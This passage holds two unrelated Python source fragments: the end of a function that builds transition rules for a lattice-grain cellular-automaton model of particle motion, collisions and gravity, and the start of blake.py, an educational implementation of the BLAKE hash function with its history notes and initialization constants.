8. IO-IO-op => OO-OO-op (1/2 each dir) (glacing collision)
9. IO-IO-sm => OO-OO-sm (30-degree collision)
10. IO-RE => RE-OU (oblique collision with rest particle)
11. IO-WA => OO-WA (oblique collision with wall)
Examples
--------
>>> xnl = lattice_grain_transition_list()
>>> len(xnl) # 6 motion plus 117 elastic
123
>>> def fn():
... return 'test'
>>> xnl = lattice_grain_transition_list(f=1.0, callback=fn)
>>> len(xnl) # 6 motion plus 87 frictional
93
>>> xnl[0].prop_update_fn()
'test'
>>> xnl = lattice_grain_transition_list(g=1.0, f=1.0, swap=True)
>>> len(xnl) # 6 motion plus 87 frictional plus 48 gravitational
141
>>> xnl[5].swap_properties
True
>>> xnl[6].swap_properties
False
"""
xn_list = []
# Set elastic-response rate, and scale frictional-response rate to motion
# rate
p_elast = motion * (1.0 - f) # rate of elastic (non-dissipative) collision
f *= motion
# Rule 1: Transitions for particle movement into an empty cell
xn_list.append(Transition((1, 0, 0), (0, 1, 0), motion, "motion", swap, callback))
xn_list.append(Transition((2, 0, 1), (0, 2, 1), motion, "motion", swap, callback))
xn_list.append(Transition((3, 0, 2), (0, 3, 2), motion, "motion", swap, callback))
xn_list.append(Transition((0, 4, 0), (4, 0, 0), motion, "motion", swap, callback))
xn_list.append(Transition((0, 5, 1), (5, 0, 1), motion, "motion", swap, callback))
xn_list.append(Transition((0, 6, 2), (6, 0, 2), motion, "motion", swap, callback))
# Rule 2: Transitions for head-on collision: elastic
if p_elast > 0.0:
xn_list.append(
Transition(
(1, 4, 0), (4, 1, 0), p_elast / 3, "head-on collision", False, callback
)
)
xn_list.append(
Transition(
(1, 4, 0), (3, 6, 0), p_elast / 3, "head-on collision", False, callback
)
)
xn_list.append(
Transition(
(1, 4, 0), (5, 2, 0), p_elast / 3, "head-on collision", False, callback
)
)
xn_list.append(
Transition(
(2, 5, 1), (5, 2, 1), p_elast / 3, "head-on collision", False, callback
)
)
xn_list.append(
Transition(
(2, 5, 1), (4, 1, 1), p_elast / 3, "head-on collision", False, callback
)
)
xn_list.append(
Transition(
(2, 5, 1), (6, 3, 1), p_elast / 3, "head-on collision", False, callback
)
)
xn_list.append(
Transition(
(3, 6, 2), (6, 3, 2), p_elast / 3, "head-on collision", False, callback
)
)
xn_list.append(
Transition(
(3, 6, 2), (1, 4, 2), p_elast / 3, "head-on collision", False, callback
)
)
xn_list.append(
Transition(
(3, 6, 2), (5, 2, 2), p_elast / 3, "head-on collision", False, callback
)
)
# Rule 2: Transitions for head-on collision: frictional dissipation
if f > 0.0:
xn_list.append(
Transition((1, 4, 0), (7, 7, 0), f, "head-on collision", False, callback)
)
xn_list.append(
Transition((2, 5, 1), (7, 7, 1), f, "head-on collision", False, callback)
)
xn_list.append(
Transition((3, 6, 2), (7, 7, 2), f, "head-on collision", False, callback)
)
# Rule 3: Transitions for oblique collision: elastic
if p_elast > 0.0:
xn_list.append(
Transition(
(1, 3, 0), (3, 1, 0), p_elast, "oblique collision", False, callback
)
)
xn_list.append(
Transition(
(1, 5, 0), (5, 1, 0), p_elast, "oblique collision", False, callback
)
)
xn_list.append(
Transition(
(2, 4, 0), (4, 2, 0), p_elast, "oblique collision", False, callback
)
)
xn_list.append(
Transition(
(6, 4, 0), (4, 6, 0), p_elast, "oblique collision", False, callback
)
)
xn_list.append(
Transition(
(2, 4, 1), (4, 2, 1), p_elast, "oblique collision", False, callback
)
)
xn_list.append(
Transition(
(2, 6, 1), (6, 2, 1), p_elast, "oblique collision", False, callback
)
)
xn_list.append(
Transition(
(1, 5, 1), (5, 1, 1), p_elast, "oblique collision", False, callback
)
)
xn_list.append(
Transition(
(3, 5, 1), (5, 3, 1), p_elast, "oblique collision", False, callback
)
)
xn_list.append(
Transition(
(3, 1, 2), (1, 3, 2), p_elast, "oblique collision", False, callback
)
)
xn_list.append(
Transition(
(3, 5, 2), (5, 3, 2), p_elast, "oblique collision", False, callback
)
)
xn_list.append(
Transition(
(2, 6, 2), (6, 2, 2), p_elast, "oblique collision", False, callback
)
)
xn_list.append(
Transition(
(4, 6, 2), (6, 4, 2), p_elast, "oblique collision", False, callback
)
)
# Rule 3 frictional
if f > 0.0:
xn_list.append(
Transition((1, 3, 0), (7, 7, 0), f, "oblique collision", False, callback)
)
xn_list.append(
Transition((1, 5, 0), (7, 7, 0), f, "oblique collision", False, callback)
)
xn_list.append(
Transition((2, 4, 0), (7, 7, 0), f, "oblique collision", False, callback)
)
xn_list.append(
Transition((6, 4, 0), (7, 7, 0), f, "oblique collision", False, callback)
)
xn_list.append(
Transition((2, 4, 1), (7, 7, 1), f, "oblique collision", False, callback)
)
xn_list.append(
Transition((2, 6, 1), (7, 7, 1), f, "oblique collision", False, callback)
)
xn_list.append(
Transition((1, 5, 1), (7, 7, 1), f, "oblique collision", False, callback)
)
xn_list.append(
Transition((3, 5, 1), (7, 7, 1), f, "oblique collision", False, callback)
)
xn_list.append(
Transition((3, 1, 2), (7, 7, 2), f, "oblique collision", False, callback)
)
xn_list.append(
Transition((3, 5, 2), (7, 7, 2), f, "oblique collision", False, callback)
)
xn_list.append(
Transition((2, 6, 2), (7, 7, 2), f, "oblique collision", False, callback)
)
xn_list.append(
Transition((4, 6, 2), (7, 7, 2), f, "oblique collision", False, callback)
)
# Rule 4: Transitions for oblique-from-behind collisions
if p_elast > 0.0:
xn_list.append(
Transition((1, 2, 0), (2, 1, 0), p_elast, "oblique", False, callback)
)
xn_list.append(
Transition((1, 6, 0), (6, 1, 0), p_elast, "oblique", False, callback)
)
xn_list.append(
Transition((3, 4, 0), (4, 3, 0), p_elast, "oblique", False, callback)
)
xn_list.append(
Transition((5, 4, 0), (4, 5, 0), p_elast, "oblique", False, callback)
)
xn_list.append(
Transition((2, 1, 1), (1, 2, 1), p_elast, "oblique", False, callback)
)
xn_list.append(
Transition((2, 3, 1), (3, 2, 1), p_elast, "oblique", False, callback)
)
xn_list.append(
Transition((4, 5, 1), (5, 4, 1), p_elast, "oblique", False, callback)
)
xn_list.append(
Transition((6, 5, 1), (5, 6, 1), p_elast, "oblique", False, callback)
)
xn_list.append(
Transition((3, 2, 2), (2, 3, 2), p_elast, "oblique", False, callback)
)
xn_list.append(
Transition((3, 4, 2), (4, 3, 2), p_elast, "oblique", False, callback)
)
xn_list.append(
Transition((1, 6, 2), (6, 1, 2), p_elast, "oblique", False, callback)
)
xn_list.append(
Transition((5, 6, 2), (6, 5, 2), p_elast, "oblique", False, callback)
)
# Rule 4 frictional
if f > 0.0:
xn_list.append(Transition((1, 2, 0), (7, 1, 0), f, "oblique", False, callback))
xn_list.append(Transition((1, 6, 0), (7, 1, 0), f, "oblique", False, callback))
xn_list.append(Transition((3, 4, 0), (4, 7, 0), f, "oblique", False, callback))
xn_list.append(Transition((5, 4, 0), (4, 7, 0), f, "oblique", False, callback))
xn_list.append(Transition((2, 1, 1), (7, 2, 1), f, "oblique", False, callback))
xn_list.append(Transition((2, 3, 1), (7, 2, 1), f, "oblique", False, callback))
xn_list.append(Transition((4, 5, 1), (5, 7, 1), f, "oblique", False, callback))
xn_list.append(Transition((6, 5, 1), (5, 7, 1), f, "oblique", False, callback))
xn_list.append(Transition((3, 2, 2), (7, 3, 2), f, "oblique", False, callback))
xn_list.append(Transition((3, 4, 2), (7, 3, 2), f, "oblique", False, callback))
xn_list.append(Transition((1, 6, 2), (6, 7, 2), f, "oblique", False, callback))
xn_list.append(Transition((5, 6, 2), (6, 7, 2), f, "oblique", False, callback))
# Rule 5: Transitions for direct-from-behind collisions
if p_elast > 0.0:
xn_list.append(
Transition((1, 1, 0), (2, 6, 0), p_elast / 4, "behind", False, callback)
)
xn_list.append(
Transition((1, 1, 0), (6, 2, 0), p_elast / 4, "behind", False, callback)
)
xn_list.append(
Transition((4, 4, 0), (3, 5, 0), p_elast / 4, "behind", False, callback)
)
xn_list.append(
Transition((4, 4, 0), (5, 3, 0), p_elast / 4, "behind", False, callback)
)
xn_list.append(
Transition((2, 2, 1), (1, 3, 1), p_elast / 4, "behind", False, callback)
)
xn_list.append(
Transition((2, 2, 1), (3, 1, 1), p_elast / 4, "behind", False, callback)
)
xn_list.append(
Transition((5, 5, 1), (4, 6, 1), p_elast / 4, "behind", False, callback)
)
xn_list.append(
Transition((5, 5, 1), (6, 4, 1), p_elast / 4, "behind", False, callback)
)
xn_list.append(
Transition((3, 3, 2), (2, 4, 2), p_elast / 4, "behind", False, callback)
)
xn_list.append(
Transition((3, 3, 2), (4, 2, 2), p_elast / 4, "behind", False, callback)
)
xn_list.append(
Transition((6, 6, 2), (1, 5, 2), p_elast / 4, "behind", False, callback)
)
xn_list.append(
Transition((6, 6, 2), (5, 1, 2), p_elast / 4, "behind", False, callback)
)
# Rule 5 frictional
if f > 0.0:
xn_list.append(
Transition((1, 1, 0), (7, 1, 0), f / 4, "behind", False, callback)
)
xn_list.append(
Transition((4, 4, 0), (4, 7, 0), f / 4, "behind", False, callback)
)
xn_list.append(
Transition((2, 2, 1), (7, 2, 1), f / 4, "behind", False, callback)
)
xn_list.append(
Transition((5, 5, 1), (5, 7, 1), f / 4, "behind", False, callback)
)
xn_list.append(
Transition((3, 3, 2), (7, 3, 2), f / 4, "behind", False, callback)
)
xn_list.append(
Transition((6, 6, 2), (6, 7, 2), f / 4, "behind", False, callback)
)
# Rule 6: Transitions for direct collision with stationary (resting) particle
if p_elast > 0.0:
xn_list.append(
Transition((1, 7, 0), (7, 1, 0), p_elast / 3.0, "rest", False, callback)
)
xn_list.append(
Transition((1, 7, 0), (7, 2, 0), p_elast / 3.0, "rest", False, callback)
)
xn_list.append(
Transition((1, 7, 0), (7, 6, 0), p_elast / 3.0, "rest", False, callback)
)
xn_list.append(
Transition((7, 4, 0), (4, 7, 0), p_elast / 3.0, "rest", False, callback)
)
xn_list.append(
Transition((7, 4, 0), (3, 7, 0), p_elast / 3.0, "rest", False, callback)
)
xn_list.append(
Transition((7, 4, 0), (5, 7, 0), p_elast / 3.0, "rest", False, callback)
)
xn_list.append(
Transition((2, 7, 1), (7, 2, 1), p_elast / 3.0, "rest", False, callback)
)
xn_list.append(
Transition((2, 7, 1), (7, 1, 1), p_elast / 3.0, "rest", False, callback)
)
xn_list.append(
Transition((2, 7, 1), (7, 3, 1), p_elast / 3.0, "rest", False, callback)
)
xn_list.append(
Transition((7, 5, 1), (5, 7, 1), p_elast / 3.0, "rest", False, callback)
)
xn_list.append(
Transition((7, 5, 1), (4, 7, 1), p_elast / 3.0, "rest", False, callback)
)
xn_list.append(
Transition((7, 5, 1), (6, 7, 1), p_elast / 3.0, "rest", False, callback)
)
xn_list.append(
Transition((3, 7, 2), (7, 3, 2), p_elast / 3.0, "rest", False, callback)
)
xn_list.append(
Transition((3, 7, 2), (7, 2, 2), p_elast / 3.0, "rest", False, callback)
)
xn_list.append(
Transition((3, 7, 2), (7, 4, 2), p_elast / 3.0, "rest", False, callback)
)
xn_list.append(
Transition((7, 6, 2), (6, 7, 2), p_elast / 3.0, "rest", False, callback)
)
xn_list.append(
Transition((7, 6, 2), (1, 7, 2), p_elast / 3.0, "rest", False, callback)
)
xn_list.append(
Transition((7, 6, 2), (5, 7, 2), p_elast / 3.0, "rest", False, callback)
)
# Rule 6 frictionl
if f > 0.0:
xn_list.append(Transition((1, 7, 0), (7, 7, 0), f, "rest", False, callback))
xn_list.append(Transition((7, 4, 0), (7, 7, 0), f, "rest", False, callback))
xn_list.append(Transition((2, 7, 1), (7, 7, 1), f, "rest", False, callback))
xn_list.append(Transition((7, 5, 1), (7, 7, 1), f, "rest", False, callback))
xn_list.append(Transition((3, 7, 2), (7, 7, 2), f, "rest", False, callback))
xn_list.append(Transition((7, 6, 2), (7, 7, 2), f, "rest", False, callback))
# Rule 7: Transitions for wall impact
if p_elast > 0.0:
xn_list.append(
Transition(
(1, 8, 0), (4, 8, 0), p_elast / 3, "wall rebound", False, callback
)
)
xn_list.append(
Transition(
(1, 8, 0), (3, 8, 0), p_elast / 3, "wall rebound", False, callback
)
)
xn_list.append(
Transition(
(1, 8, 0), (5, 8, 0), p_elast / 3, "wall rebound", False, callback
)
)
xn_list.append(
Transition(
(2, 8, 1), (5, 8, 1), p_elast / 3, "wall rebound", False, callback
)
)
xn_list.append(
Transition(
(2, 8, 1), (4, 8, 1), p_elast / 3, "wall rebound", False, callback
)
)
xn_list.append(
Transition(
(2, 8, 1), (6, 8, 1), p_elast / 3, "wall rebound", False, callback
)
)
xn_list.append(
Transition(
(3, 8, 2), (6, 8, 2), p_elast / 3, "wall rebound", False, callback
)
)
xn_list.append(
Transition(
(3, 8, 2), (5, 8, 2), p_elast / 3, "wall rebound", False, callback
)
)
xn_list.append(
Transition(
(3, 8, 2), (1, 8, 2), p_elast / 3, "wall rebound", False, callback
)
)
xn_list.append(
Transition(
(8, 4, 0), (8, 1, 0), p_elast / 3, "wall rebound", False, callback
)
)
xn_list.append(
Transition(
(8, 4, 0), (8, 6, 0), p_elast / 3, "wall rebound", False, callback
)
)
xn_list.append(
Transition(
(8, 4, 0), (8, 2, 0), p_elast / 3, "wall rebound", False, callback
)
)
xn_list.append(
Transition(
(8, 5, 1), (8, 1, 1), p_elast / 3, "wall rebound", False, callback
)
)
xn_list.append(
Transition(
(8, 5, 1), (8, 2, 1), p_elast / 3, "wall rebound", False, callback
)
)
xn_list.append(
Transition(
(8, 5, 1), (8, 3, 1), p_elast / 3, "wall rebound", False, callback
)
)
xn_list.append(
Transition(
(8, 6, 2), (8, 2, 2), p_elast / 3, "wall rebound", False, callback
)
)
xn_list.append(
Transition(
(8, 6, 2), (8, 3, 2), p_elast / 3, "wall rebound", False, callback
)
)
xn_list.append(
Transition(
(8, 6, 2), (8, 4, 2), p_elast / 3, "wall rebound", False, callback
)
)
# Rule 7 frictional
if f > 0.0:
xn_list.append(
Transition((1, 8, 0), (7, 8, 0), f, "wall rebound", False, callback)
)
xn_list.append(
Transition((2, 8, 1), (7, 8, 1), f, "wall rebound", False, callback)
)
xn_list.append(
Transition((3, 8, 2), (7, 8, 2), f, "wall rebound", False, callback)
)
xn_list.append(
Transition((8, 4, 0), (8, 7, 0), f, "wall rebound", False, callback)
)
xn_list.append(
Transition((8, 5, 1), (8, 7, 1), f, "wall rebound", False, callback)
)
xn_list.append(
Transition((8, 6, 2), (8, 7, 2), f, "wall rebound", False, callback)
)
# Rule 8: Transitions for glancing oblique collision
if p_elast > 0.0:
xn_list.append(
Transition((2, 5, 0), (3, 6, 0), p_elast, "glancing", False, callback)
)
xn_list.append(
Transition((6, 3, 0), (5, 2, 0), p_elast, "glancing", False, callback)
)
xn_list.append(
Transition((3, 6, 1), (4, 1, 1), p_elast, "glancing", False, callback)
)
xn_list.append(
Transition((1, 4, 1), (6, 3, 1), p_elast, "glancing", False, callback)
)
xn_list.append(
Transition((4, 1, 2), (5, 2, 2), p_elast, "glancing", False, callback)
)
xn_list.append(
Transition((2, 5, 2), (1, 4, 2), p_elast, "glancing", False, callback)
)
# Rule 8 frictional
if f > 0.0:
xn_list.append(Transition((2, 5, 0), (7, 7, 0), f, "glancing", False, callback))
xn_list.append(Transition((6, 3, 0), (7, 7, 0), f, "glancing", False, callback))
xn_list.append(Transition((3, 6, 1), (7, 7, 1), f, "glancing", False, callback))
xn_list.append(Transition((1, 4, 1), (7, 7, 1), f, "glancing", False, callback))
xn_list.append(Transition((4, 1, 2), (7, 7, 2), f, "glancing", False, callback))
xn_list.append(Transition((2, 5, 2), (7, 7, 2), f, "glancing", False, callback))
# Rule 9: Transitions for "near-on" collisions
if p_elast > 0.0:
xn_list.append(
Transition((6, 5, 0), (5, 6, 0), p_elast, "near-on", False, callback)
)
xn_list.append(
Transition((2, 3, 0), (3, 2, 0), p_elast, "near-on", False, callback)
)
xn_list.append(
Transition((1, 6, 1), (6, 1, 1), p_elast, "near-on", False, callback)
)
xn_list.append(
Transition((3, 4, 1), (4, 3, 1), p_elast, "near-on", False, callback)
)
xn_list.append(
Transition((2, 1, 2), (1, 2, 2), p_elast, "near-on", False, callback)
)
xn_list.append(
Transition((4, 5, 2), (5, 4, 2), p_elast, "near-on", False, callback)
)
# Rule 9 frictional
if f > 0.0:
xn_list.append(
Transition((6, 5, 0), (7, 6, 0), f / 2, "near-on", False, callback)
)
xn_list.append(
Transition((6, 5, 0), (5, 7, 0), f / 2, "near-on", False, callback)
)
xn_list.append(
Transition((2, 3, 0), (7, 2, 0), f / 2, "near-on", False, callback)
)
xn_list.append(
Transition((2, 3, 0), (3, 7, 0), f / 2, "near-on", False, callback)
)
xn_list.append(
Transition((1, 6, 1), (7, 1, 1), f / 2, "near-on", False, callback)
)
xn_list.append(
Transition((1, 6, 1), (6, 7, 1), f / 2, "near-on", False, callback)
)
xn_list.append(
Transition((3, 4, 1), (7, 3, 1), f / 2, "near-on", False, callback)
)
xn_list.append(
Transition((3, 4, 1), (4, 7, 1), f / 2, "near-on", False, callback)
)
xn_list.append(
Transition((2, 1, 2), (7, 2, 2), f / 2, "near-on", False, callback)
)
xn_list.append(
Transition((2, 1, 2), (1, 7, 2), f / 2, "near-on", False, callback)
)
xn_list.append(
Transition((4, 5, 2), (7, 4, 2), f / 2, "near-on", False, callback)
)
xn_list.append(
Transition((4, 5, 2), (5, 7, 2), f / 2, "near-on", False, callback)
)
# Rule 10: Transitions for oblique collision with rest particle
if p_elast > 0.0:
xn_list.append(
Transition(
(2, 7, 0), (7, 1, 0), p_elast, "oblique with rest", False, callback
)
)
xn_list.append(
Transition(
(6, 7, 0), (7, 1, 0), p_elast, "oblique with rest", False, callback
)
)
xn_list.append(
Transition(
(7, 3, 0), (4, 7, 0), p_elast, "oblique with rest", False, callback
)
)
xn_list.append(
Transition(
(7, 5, 0), (4, 7, 0), p_elast, "oblique with rest", False, callback
)
)
xn_list.append(
Transition(
(3, 7, 1), (7, 2, 1), p_elast, "oblique with rest", False, callback
)
)
xn_list.append(
Transition(
(1, 7, 1), (7, 2, 1), p_elast, "oblique with rest", False, callback
)
)
xn_list.append(
Transition(
(7, 6, 1), (5, 7, 1), p_elast, "oblique with rest", False, callback
)
)
xn_list.append(
Transition(
(7, 4, 1), (5, 7, 1), p_elast, "oblique with rest", False, callback
)
)
xn_list.append(
Transition(
(4, 7, 2), (7, 3, 2), p_elast, "oblique with rest", False, callback
)
)
xn_list.append(
Transition(
(2, 7, 2), (7, 3, 2), p_elast, "oblique with rest", False, callback
)
)
xn_list.append(
Transition(
(7, 5, 2), (6, 7, 2), p_elast, "oblique with rest", False, callback
)
)
xn_list.append(
Transition(
(7, 1, 2), (6, 7, 2), p_elast, "oblique with rest", False, callback
)
)
# Rule 10 frictional
if f > 0.0:
xn_list.append(
Transition((2, 7, 0), (7, 7, 0), f, "oblique with rest", False, callback)
)
xn_list.append(
Transition((6, 7, 0), (7, 7, 0), f, "oblique with rest", False, callback)
)
xn_list.append(
Transition((7, 3, 0), (7, 7, 0), f, "oblique with rest", False, callback)
)
xn_list.append(
Transition((7, 5, 0), (7, 7, 0), f, "oblique with rest", False, callback)
)
xn_list.append(
Transition((3, 7, 1), (7, 7, 1), f, "oblique with rest", False, callback)
)
xn_list.append(
Transition((1, 7, 1), (7, 7, 1), f, "oblique with rest", False, callback)
)
xn_list.append(
Transition((7, 6, 1), (7, 7, 1), f, "oblique with rest", False, callback)
)
xn_list.append(
Transition((7, 4, 1), (7, 7, 1), f, "oblique with rest", False, callback)
)
xn_list.append(
Transition((4, 7, 2), (7, 7, 2), f, "oblique with rest", False, callback)
)
xn_list.append(
Transition((2, 7, 2), (7, 7, 2), f, "oblique with rest", False, callback)
)
xn_list.append(
Transition((7, 5, 2), (7, 7, 2), f, "oblique with rest", False, callback)
)
xn_list.append(
Transition((7, 1, 2), (7, 7, 2), f, "oblique with rest", False, callback)
)
# Rule 11: Transitions for oblique collision with wall particle
if p_elast > 0.0:
xn_list.append(
Transition(
(2, 8, 0), (3, 8, 0), p_elast, "oblique with wall", False, callback
)
)
xn_list.append(
Transition(
(6, 8, 0), (5, 8, 0), p_elast, "oblique with wall", False, callback
)
)
xn_list.append(
Transition(
(8, 3, 0), (8, 2, 0), p_elast, "oblique with wall", False, callback
)
)
xn_list.append(
Transition(
(8, 5, 0), (8, 6, 0), p_elast, "oblique with wall", False, callback
)
)
xn_list.append(
Transition(
(1, 8, 1), (6, 8, 1), p_elast, "oblique with wall", False, callback
)
)
xn_list.append(
Transition(
(3, 8, 1), (4, 8, 1), p_elast, "oblique with wall", False, callback
)
)
xn_list.append(
Transition(
(8, 4, 1), (8, 3, 1), p_elast, "oblique with wall", False, callback
)
)
xn_list.append(
Transition(
(8, 6, 1), (8, 1, 1), p_elast, "oblique with wall", False, callback
)
)
xn_list.append(
Transition(
(4, 8, 2), (5, 8, 2), p_elast, "oblique with wall", False, callback
)
)
xn_list.append(
Transition(
(2, 8, 2), (1, 8, 2), p_elast, "oblique with wall", False, callback
)
)
xn_list.append(
Transition(
(8, 1, 2), (8, 2, 2), p_elast, "oblique with wall", False, callback
)
)
xn_list.append(
Transition(
(8, 5, 2), (8, 4, 2), p_elast, "oblique with wall", False, callback
)
)
# Rule 11 frictional
if f > 0.0:
xn_list.append(
Transition((2, 8, 0), (7, 8, 0), f, "oblique with wall", False, callback)
)
xn_list.append(
Transition((6, 8, 0), (7, 8, 0), f, "oblique with wall", False, callback)
)
xn_list.append(
Transition((8, 3, 0), (8, 7, 0), f, "oblique with wall", False, callback)
)
xn_list.append(
Transition((8, 5, 0), (8, 7, 0), f, "oblique with wall", False, callback)
)
xn_list.append(
Transition((1, 8, 1), (7, 8, 1), f, "oblique with wall", False, callback)
)
xn_list.append(
Transition((3, 8, 1), (7, 8, 1), f, "oblique with wall", False, callback)
)
xn_list.append(
Transition((8, 4, 1), (8, 7, 1), f, "oblique with wall", False, callback)
)
xn_list.append(
Transition((8, 6, 1), (8, 7, 1), f, "oblique with wall", False, callback)
)
xn_list.append(
Transition((4, 8, 2), (7, 8, 2), f, "oblique with wall", False, callback)
)
xn_list.append(
Transition((2, 8, 2), (7, 8, 2), f, "oblique with wall", False, callback)
)
xn_list.append(
Transition((8, 1, 2), (8, 7, 2), f, "oblique with wall", False, callback)
)
xn_list.append(
Transition((8, 5, 2), (8, 7, 2), f, "oblique with wall", False, callback)
)
# Gravity rule 1: rising particles become rest particles
if g > 0.0:
xn_list.append(
Transition((0, 1, 0), (0, 7, 0), g, "gravity 1", False, callback)
)
xn_list.append(
Transition((1, 1, 0), (1, 7, 0), g, "gravity 1", False, callback)
)
xn_list.append(
Transition((2, 1, 0), (2, 7, 0), g, "gravity 1", False, callback)
)
xn_list.append(
Transition((3, 1, 0), (3, 7, 0), g, "gravity 1", False, callback)
)
xn_list.append(
Transition((4, 1, 0), (4, 7, 0), g, "gravity 1", False, callback)
)
xn_list.append(
Transition((5, 1, 0), (5, 7, 0), g, "gravity 1", False, callback)
)
xn_list.append(
Transition((6, 1, 0), (6, 7, 0), g, "gravity 1", False, callback)
)
xn_list.append(
Transition((7, 1, 0), (7, 7, 0), g, "gravity 1", False, callback)
)
xn_list.append(
Transition((8, 1, 0), (8, 7, 0), g, "gravity 1", False, callback)
)
# Gravity rule 2: resting particles become falling particles (if above air)
if g > 0.0:
xn_list.append(
Transition((0, 7, 0), (0, 4, 0), g, "gravity 2", False, callback)
)
# Gravity rule 3: up/sideways particles become down/sideways particles
if g > 0.0:
xn_list.append(
Transition((0, 2, 0), (0, 3, 0), g, "gravity 3", False, callback)
)
xn_list.append(
Transition((1, 2, 0), (1, 3, 0), g, "gravity 3", False, callback)
)
xn_list.append(
Transition((2, 2, 0), (2, 3, 0), g, "gravity 3", False, callback)
)
xn_list.append(
Transition((3, 2, 0), (3, 3, 0), g, "gravity 3", False, callback)
)
xn_list.append(
Transition((4, 2, 0), (4, 3, 0), g, "gravity 3", False, callback)
)
xn_list.append(
Transition((5, 2, 0), (5, 3, 0), g, "gravity 3", False, callback)
)
xn_list.append(
Transition((6, 2, 0), (6, 3, 0), g, "gravity 3", False, callback)
)
xn_list.append(
Transition((7, 2, 0), (7, 3, 0), g, "gravity 3", False, callback)
)
xn_list.append(
Transition((8, 2, 0), (8, 3, 0), g, "gravity 3", False, callback)
)
xn_list.append(
Transition((0, 6, 0), (0, 5, 0), g, "gravity 3", False, callback)
)
xn_list.append(
Transition((1, 6, 0), (1, 5, 0), g, "gravity 3", False, callback)
)
xn_list.append(
Transition((2, 6, 0), (2, 5, 0), g, "gravity 3", False, callback)
)
xn_list.append(
Transition((3, 6, 0), (3, 5, 0), g, "gravity 3", False, callback)
)
xn_list.append(
Transition((4, 6, 0), (4, 5, 0), g, "gravity 3", False, callback)
)
xn_list.append(
Transition((5, 6, 0), (5, 5, 0), g, "gravity 3", False, callback)
)
xn_list.append(
Transition((6, 6, 0), (6, 5, 0), g, "gravity 3", False, callback)
)
xn_list.append(
Transition((7, 6, 0), (7, 5, 0), g, "gravity 3", False, callback)
)
xn_list.append(
Transition((8, 6, 0), (8, 5, 0), g, "gravity 3", False, callback)
)
# Gravity rule 4: down/side to straight down
if g > 0.0:
xn_list.append(
Transition((0, 3, 0), (0, 4, 0), g, "gravity 4", False, callback)
)
xn_list.append(
Transition((1, 3, 0), (1, 4, 0), g, "gravity 4", False, callback)
)
xn_list.append(
Transition((2, 3, 0), (2, 4, 0), g, "gravity 4", False, callback)
)
xn_list.append(
Transition((3, 3, 0), (3, 4, 0), g, "gravity 4", False, callback)
)
xn_list.append(
Transition((4, 3, 0), (4, 4, 0), g, "gravity 4", False, callback)
)
xn_list.append(
Transition((5, 3, 0), (5, 4, 0), g, "gravity 4", False, callback)
)
xn_list.append(
Transition((6, 3, 0), (6, 4, 0), g, "gravity 4", False, callback)
)
xn_list.append(
Transition((7, 3, 0), (7, 4, 0), g, "gravity 4", False, callback)
)
xn_list.append(
Transition((8, 3, 0), (8, 4, 0), g, "gravity 4", False, callback)
)
xn_list.append(
Transition((0, 5, 0), (0, 4, 0), g, "gravity 4", False, callback)
)
xn_list.append(
Transition((1, 5, 0), (1, 4, 0), g, "gravity 4", False, callback)
)
xn_list.append(
Transition((2, 5, 0), (2, 4, 0), g, "gravity 4", False, callback)
)
xn_list.append(
Transition((3, 5, 0), (3, 4, 0), g, "gravity 4", False, callback)
)
xn_list.append(
Transition((4, 5, 0), (4, 4, 0), g, "gravity 4", False, callback)
)
xn_list.append(
Transition((5, 5, 0), (5, 4, 0), g, "gravity 4", False, callback)
)
xn_list.append(
Transition((6, 5, 0), (6, 4, 0), g, "gravity 4", False, callback)
)
xn_list.append(
Transition((7, 5, 0), (7, 4, 0), g, "gravity 4", False, callback)
)
xn_list.append(
Transition((8, 5, 0), (8, 4, 0), g, "gravity 4", False, callback)
)
# Gravity rule for lateral destabilization (represents grain
# motion above angle of repose on sloping surface)
if g > 0.0:
xn_list.append(
Transition((7, 0, 2), (3, 0, 2), g / 2.0, "gravity", False, callback)
)
xn_list.append(
Transition((0, 7, 1), (0, 5, 1), g / 2.0, "gravity", False, callback)
)
return xn_list
|
|
intro = """
blake.py
version 5, 2-Apr-2014
BLAKE is a SHA3 round-3 finalist designed and submitted by
Jean-Philippe Aumasson et al.
At the core of BLAKE is a ChaCha-like mixer, very similar
to that found in the stream cipher, ChaCha8. Besides being
a very good mixer, ChaCha is fast.
References:
http://www.131002.net/blake/
http://csrc.nist.gov/groups/ST/hash/sha-3/index.html
http://en.wikipedia.org/wiki/BLAKE_(hash_function)
This implementation assumes all data is in increments of
whole bytes. (The formal definition of BLAKE allows for
hashing individual bits.) Note too that this implementation
does include the round-3 tweaks where the number of rounds
was increased to 14/16 from 10/14.
This version can be imported into both Python2 (2.6 and 2.7)
and Python3 programs. Python 2.5 requires an older version
of blake.py (version 4).
Here are some comparative times for different versions of
Python:
64-bit:
2.6 6.284s
2.7 6.343s
3.2 7.620s
pypy (2.7) 2.080s
32-bit:
2.5 (32) 15.389s (with psyco)
2.7-32 13.645s
3.2-32 12.574s
One test on a 2.0GHz Core 2 Duo of 10,000 iterations of
BLAKE-256 on a short message produced a time of 5.7 seconds.
Not bad, but if raw speed is what you want, look to the
the C version. It is 40x faster and did the same thing
in 0.13 seconds.
Copyright (c) 2009-2012 by Larry Bugbee, Kent, WA
ALL RIGHTS RESERVED.
blake.py IS EXPERIMENTAL SOFTWARE FOR EDUCATIONAL
PURPOSES ONLY. IT IS MADE AVAILABLE "AS-IS" WITHOUT
WARRANTY OR GUARANTEE OF ANY KIND. USE SIGNIFIES
ACCEPTANCE OF ALL RISK.
To make your learning and experimentation less cumbersome,
blake.py is free for any use.
Enjoy,
Larry Bugbee
March 2011
rev May 2011 - fixed Python version check (tx JP)
rev Apr 2012 - fixed an out-of-order bit set in final()
- moved self-test to a separate test pgm
- this now works with Python2 and Python3
rev Apr 2014 - added test and conversion of string input
to byte string in update() (tx Soham)
- added hexdigest() method.
- now support state 3 so only one call to
final() per instantiation is allowed. all
subsequent calls to final(), digest() or
hexdigest() simply return the stored value.
"""
import struct
from binascii import hexlify, unhexlify
#---------------------------------------------------------------
class BLAKE(object):
# - - - - - - - - - - - - - - - - - - - - - - - - - - -
# initial values, constants and padding
# IVx for BLAKE-x
IV64 = [
0x6A09E667F3BCC908, 0xBB67AE8584CAA73B,
0x3C6EF372FE94F82B, 0xA54FF53A5F1D36F1,
0x510E527FADE682D1, 0x9B05688C2B3E6C1F,
0x1F83D9ABFB41BD6B, 0x5BE0CD19137E2179,
]
IV48 = [
0xCBBB9D5DC1059ED8, 0x629A292A367CD507,
0x9159015A3070DD17, 0x152FECD8F70E5939,
0x67332667FFC00B31, 0x8EB44A8768581511,
0xDB0C2E0D64F98FA7, 0x47B5481DBEFA4FA4,
]
# note: the values here are the same as the high-order
# half-words of IV64
IV32 = [
0x6A09E667, 0xBB67AE85,
